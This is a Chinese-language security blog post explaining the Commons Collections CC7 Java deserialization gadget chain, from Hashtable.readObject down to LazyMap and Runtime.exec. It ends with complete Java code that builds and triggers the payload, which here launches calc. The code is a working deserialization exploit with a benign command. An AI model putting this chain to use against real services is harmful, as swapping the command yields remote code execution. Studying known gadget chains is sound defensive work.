<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="作者：Narcher	时间：2024&#x2F;3&#x2F;20	分类：Vulnerability Analysis">
<meta property="og:type" content="article">
<meta property="og:title" content="JAVA安全:CC7链">
<meta property="og:url" content="http://example.com/2024/12/22/JAVA%E5%AE%89%E5%85%A8CC7%E9%93%BE/index.html">
<meta property="og:site_name" content="Narcherの小窝">
<meta property="og:description" content="作者：Narcher	时间：2024&#x2F;3&#x2F;20	分类：Vulnerability Analysis">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2024/12/22/JAVA%E5%AE%89%E5%85%A8CC7%E9%93%BE/1710855641604.png">
<meta property="og:image" content="http://example.com/2024/12/22/JAVA%E5%AE%89%E5%85%A8CC7%E9%93%BE/1710856682591.png">
<meta property="og:image" content="http://example.com/2024/12/22/JAVA%E5%AE%89%E5%85%A8CC7%E9%93%BE/1710856778618.png">
<meta property="og:image" content="http://example.com/2024/12/22/JAVA%E5%AE%89%E5%85%A8CC7%E9%93%BE/1710856824632.png">
<meta property="og:image" content="http://example.com/2024/12/22/JAVA%E5%AE%89%E5%85%A8CC7%E9%93%BE/1710856931546.png">
<meta property="og:image" content="http://example.com/2024/12/22/JAVA%E5%AE%89%E5%85%A8CC7%E9%93%BE/1710857165911.png">
<meta property="og:image" content="http://example.com/2024/12/22/JAVA%E5%AE%89%E5%85%A8CC7%E9%93%BE/image-20240320151803680.png">
<meta property="og:image" content="http://example.com/2024/12/22/JAVA%E5%AE%89%E5%85%A8CC7%E9%93%BE/image-20240320152111512.png">
<meta property="og:image" content="http://example.com/2024/12/22/JAVA%E5%AE%89%E5%85%A8CC7%E9%93%BE/image-20240320152205265.png">
<meta property="og:image" content="http://example.com/2024/12/22/JAVA%E5%AE%89%E5%85%A8CC7%E9%93%BE/image-20240320152427981.png">
<meta property="article:published_time" content="2024-12-22T08:37:36.081Z">
<meta property="article:modified_time" content="2024-08-24T03:27:00.236Z">
<meta property="article:author" content="Narcher Alter">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2024/12/22/JAVA%E5%AE%89%E5%85%A8CC7%E9%93%BE/1710855641604.png">

<link rel="canonical" href="http://example.com/2024/12/22/JAVA%E5%AE%89%E5%85%A8CC7%E9%93%BE/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>JAVA安全:CC7链 | Narcherの小窝</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Narcherの小窝</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="http://example.com/2024/12/22/JAVA%E5%AE%89%E5%85%A8CC7%E9%93%BE/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Narcher Alter">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Narcherの小窝">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          JAVA安全:CC7链
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2024-12-22 16:37:36" itemprop="dateCreated datePublished" datetime="2024-12-22T16:37:36+08:00">2024-12-22</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2024-08-24 11:27:00" itemprop="dateModified" datetime="2024-08-24T11:27:00+08:00">2024-08-24</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p><em>作者：Narcher</em>	<em>时间：2024&#x2F;3&#x2F;20</em>	<em>分类：Vulnerability Analysis</em></p>
<span id="more"></span>

<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>作为CC链系列的最后一条，当然要放到最后学啦</p>
<h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h2><p>我们先来看一下ysoserial中的CC7链流程：</p>
<img src="/2024/12/22/JAVA%E5%AE%89%E5%85%A8CC7%E9%93%BE/1710855641604.png" alt="1710855641604" style="zoom:67%;">

<p>这里是在LazyMap的get方法之前发生了变化，我们还是按照之前的思路，一点点分析</p>
<h3 id="1-AbstractMap部分"><a href="#1-AbstractMap部分" class="headerlink" title="1.AbstractMap部分"></a>1.AbstractMap部分</h3><p>从调用get方法的类里边找，找到了AbstractMap类，它的equals方法调用了get方法：</p>
<img src="/2024/12/22/JAVA%E5%AE%89%E5%85%A8CC7%E9%93%BE/1710856682591.png" alt="1710856682591" style="zoom: 50%;">

<p>m对象是我们传入的参数，可控，我们继续向上找</p>
<h3 id="2-AbstractMapDecorator部分"><a href="#2-AbstractMapDecorator部分" class="headerlink" title="2.AbstractMapDecorator部分"></a>2.AbstractMapDecorator部分</h3><img src="/2024/12/22/JAVA%E5%AE%89%E5%85%A8CC7%E9%93%BE/1710856778618.png" alt="1710856778618" style="zoom:67%;">

<p>发现AbstractMapDecorator类的equals方法调用了equals方法，且其构造器如下：</p>
<img src="/2024/12/22/JAVA%E5%AE%89%E5%85%A8CC7%E9%93%BE/1710856824632.png" alt="1710856824632" style="zoom:67%;">

<p>map参数可控，我们继续往上找</p>
<h3 id="3-HashTable部分"><a href="#3-HashTable部分" class="headerlink" title="3.HashTable部分"></a>3.HashTable部分</h3><img src="/2024/12/22/JAVA%E5%AE%89%E5%85%A8CC7%E9%93%BE/1710856931546.png" alt="1710856931546" style="zoom:67%;">

<p>HashTable类的reconstitutionPut方法对equals方法进行了调用，看起来流程也很简单，就是对增加的key进行hash计算，如果hash值与tab中的所有元素均不同，就会增加到数组tab中，否则就会报异常</p>
<p>我们再看看调用该方法的部分：</p>
<img src="/2024/12/22/JAVA%E5%AE%89%E5%85%A8CC7%E9%93%BE/1710857165911.png" alt="1710857165911" style="zoom: 67%;">

<p>HashTable类中的readObject方法，看到这里我们就大功告成了，HashTable类完全可以作为链子的结尾。我们来构造链子</p>
<h3 id="4-构造链"><a href="#4-构造链" class="headerlink" title="4.构造链"></a>4.构造链</h3><p>首先，LazyMap之前的部分由于和CC1链相同，我们就直接copy过来：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">Transformer[] transformers=<span class="keyword">new</span> <span class="title class_">Transformer</span>[]&#123;</span><br><span class="line">        <span class="keyword">new</span> <span class="title class_">ConstantTransformer</span>(Runtime.class),</span><br><span class="line">        <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;getDeclaredMethod&quot;</span>,<span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class,Class[].class&#125;,<span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;getRuntime&quot;</span>,<span class="literal">null</span>&#125;),</span><br><span class="line">        <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;invoke&quot;</span>,<span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;Object.class,Object[].class&#125;,<span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="literal">null</span>,<span class="literal">null</span>&#125;),</span><br><span class="line">        <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;exec&quot;</span>,<span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class&#125;,<span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;calc&quot;</span>&#125;)</span><br><span class="line">&#125;;</span><br><span class="line">ChainedTransformer chainedTransformer= <span class="keyword">new</span> <span class="title class_">ChainedTransformer</span>(transformers);</span><br></pre></td></tr></table></figure>

<p>接下来我们按照链子触发的顺序来写链子</p>
<h4 id="4-1-HashTable部分"><a href="#4-1-HashTable部分" class="headerlink" title="4.1 HashTable部分"></a>4.1 HashTable部分</h4><p>HashTable的readObject方法会直接用reconstitutionPut方法来读取序列化数据，我们要利用reconstitutionPut方法触发其中的equals方法，就需要进入其for循环的if判断，而且需要if判断的第一个判断（二者hash值相同）通过，因此我们需要至少传入两个hash值相同的LazyMap，那么我们就需要控制LazyMap的key和value值，网上key的hash相同的有yy和zZ或AaAaAa和BBAaBB等，我们随便选一组作为两个LazyMap的key值即可</p>
<img src="/2024/12/22/JAVA%E5%AE%89%E5%85%A8CC7%E9%93%BE/image-20240320151803680.png" alt="image-20240320151803680" style="zoom:67%;">

<p>这里调用的e.key.equals(key)要特别注意一下，e指的是数组tab，e.key的key指的是传入的第一个LazyMap，equals(key)中的key指的是传入的第二个LazyMap，我们就是要用第二个LazyMap触发命令执行</p>
<h4 id="4-2-AbstractMapDecorator部分"><a href="#4-2-AbstractMapDecorator部分" class="headerlink" title="4.2 AbstractMapDecorator部分"></a>4.2 AbstractMapDecorator部分</h4><p>由于LazyMap没有equals方法，所以会调用LazyMap的父类AbstractMapDecorator中的equals方法</p>
<img src="/2024/12/22/JAVA%E5%AE%89%E5%85%A8CC7%E9%93%BE/image-20240320152111512.png" alt="image-20240320152111512" style="zoom:67%;">

<p>（这里其实就是把上边的图复制下来了，因为流程是一样的，只是反过来了）</p>
<img src="/2024/12/22/JAVA%E5%AE%89%E5%85%A8CC7%E9%93%BE/image-20240320152205265.png" alt="image-20240320152205265" style="zoom:67%;">

<p>这里我们传入了LazyMap，其this.map指的是LazyMap中传入的HashMap，看不懂的话可以调试一下</p>
<p>之后触发HashMap的equals方法</p>
<h4 id="4-3AbstractMap部分"><a href="#4-3AbstractMap部分" class="headerlink" title="4.3AbstractMap部分"></a>4.3AbstractMap部分</h4><p>HashMap也没有equals方法，因此也会调用其父类的equals方法</p>
<img src="/2024/12/22/JAVA%E5%AE%89%E5%85%A8CC7%E9%93%BE/image-20240320152427981.png" alt="image-20240320152427981" style="zoom:67%;">

<p>这时里边传入的o对象其实还是我们刚开始传入的第二个LazyMap对象，经过上边的一系列判断便可调用LazyMap的get方法，之后便会触发如同CC1链一样的流程而进行命令执行。</p>
<h4 id="4-4-链子展示"><a href="#4-4-链子展示" class="headerlink" title="4.4 链子展示"></a>4.4 链子展示</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">Transformer[] transformers=<span class="keyword">new</span> <span class="title class_">Transformer</span>[]&#123;</span><br><span class="line">        <span class="keyword">new</span> <span class="title class_">ConstantTransformer</span>(Runtime.class),</span><br><span class="line">        <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;getDeclaredMethod&quot;</span>,<span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class,Class[].class&#125;,<span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;getRuntime&quot;</span>,<span class="literal">null</span>&#125;),</span><br><span class="line">        <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;invoke&quot;</span>,<span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;Object.class,Object[].class&#125;,<span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="literal">null</span>,<span class="literal">null</span>&#125;),</span><br><span class="line">        <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;exec&quot;</span>,<span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class&#125;,<span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;calc&quot;</span>&#125;)</span><br><span class="line">&#125;;</span><br><span class="line"><span class="type">ChainedTransformer</span> <span class="variable">chainedTransformer</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ChainedTransformer</span>(<span class="keyword">new</span> <span class="title class_">Transformer</span>[]&#123;&#125;);</span><br><span class="line">HashMap&lt;Object,Object&gt; innerMap1 = <span class="keyword">new</span> <span class="title class_">HashMap</span>&lt;&gt;();</span><br><span class="line">HashMap&lt;Object,Object&gt; innerMap2 = <span class="keyword">new</span> <span class="title class_">HashMap</span>&lt;&gt;();</span><br><span class="line"><span class="type">Map</span> <span class="variable">lazyMap1</span> <span class="operator">=</span> LazyMap.decorate(innerMap1, chainedTransformer);</span><br><span class="line"><span class="type">Map</span> <span class="variable">lazyMap2</span> <span class="operator">=</span> LazyMap.decorate(innerMap2, chainedTransformer);</span><br><span class="line">lazyMap1.put(<span class="string">&quot;yy&quot;</span>,<span class="number">1</span>);</span><br><span class="line">lazyMap2.put(<span class="string">&quot;zZ&quot;</span>,<span class="number">1</span>);</span><br><span class="line"><span class="type">Hashtable</span> <span class="variable">hashtable</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Hashtable</span>();</span><br><span class="line">hashtable.put(lazyMap1, <span class="number">1</span>);</span><br><span class="line">hashtable.put(lazyMap2, <span class="number">1</span>);</span><br><span class="line"><span class="type">Class</span> <span class="variable">c</span> <span class="operator">=</span> chainedTransformer.getClass();</span><br><span class="line"><span class="type">Field</span> <span class="variable">iTransformersField</span> <span class="operator">=</span> c.getDeclaredField(<span class="string">&quot;iTransformers&quot;</span>);</span><br><span class="line">iTransformersField.setAccessible(<span class="literal">true</span>);</span><br><span class="line">iTransformersField.set(chainedTransformer, transformers);</span><br><span class="line">lazyMap2.remove(<span class="string">&quot;yy&quot;</span>);</span><br><span class="line"><span class="comment">//序列化</span></span><br><span class="line"><span class="type">ObjectOutputStream</span> <span class="variable">oos</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectOutputStream</span>(<span class="keyword">new</span> <span class="title class_">FileOutputStream</span>(<span class="string">&quot;C:\\Users\\Narcher\\IdeaProjects\\CC7.txt&quot;</span>));</span><br><span class="line">oos.writeObject(hashtable);</span><br><span class="line"><span class="comment">//反序列化</span></span><br><span class="line"><span class="type">ObjectInputStream</span> <span class="variable">ois</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectInputStream</span>(<span class="keyword">new</span> <span class="title class_">FileInputStream</span>(<span class="string">&quot;C:\\Users\\Narcher\\IdeaProjects\\CC7.txt&quot;</span>));</span><br><span class="line">ois.readObject();</span><br></pre></td></tr></table></figure>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2024/12/22/JAVA%E5%AE%89%E5%85%A8CC5%E9%93%BE/" rel="prev" title="JAVA安全:CC5链">
      <i class="fa fa-chevron-left"></i> JAVA安全:CC5链
    </a></div>
      <div class="post-nav-item">
    <a href="/2024/12/22/JAVA%E5%AE%89%E5%85%A8shiro-550%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/" rel="next" title="JAVA安全:Shiro-550反序列化">
      JAVA安全:Shiro-550反序列化 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%AD%A3%E6%96%87"><span class="nav-number">2.</span> <span class="nav-text">正文</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-AbstractMap%E9%83%A8%E5%88%86"><span class="nav-number">2.1.</span> <span class="nav-text">1.AbstractMap部分</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-AbstractMapDecorator%E9%83%A8%E5%88%86"><span class="nav-number">2.2.</span> <span class="nav-text">2.AbstractMapDecorator部分</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-HashTable%E9%83%A8%E5%88%86"><span class="nav-number">2.3.</span> <span class="nav-text">3.HashTable部分</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-%E6%9E%84%E9%80%A0%E9%93%BE"><span class="nav-number">2.4.</span> <span class="nav-text">4.构造链</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#4-1-HashTable%E9%83%A8%E5%88%86"><span class="nav-number">2.4.1.</span> <span class="nav-text">4.1 HashTable部分</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#4-2-AbstractMapDecorator%E9%83%A8%E5%88%86"><span class="nav-number">2.4.2.</span> <span class="nav-text">4.2 AbstractMapDecorator部分</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#4-3AbstractMap%E9%83%A8%E5%88%86"><span class="nav-number">2.4.3.</span> <span class="nav-text">4.3AbstractMap部分</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#4-4-%E9%93%BE%E5%AD%90%E5%B1%95%E7%A4%BA"><span class="nav-number">2.4.4.</span> <span class="nav-text">4.4 链子展示</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Narcher Alter</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">14</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Narcher Alter</span>
</div>
<!--
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a>
  </div>
-->

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
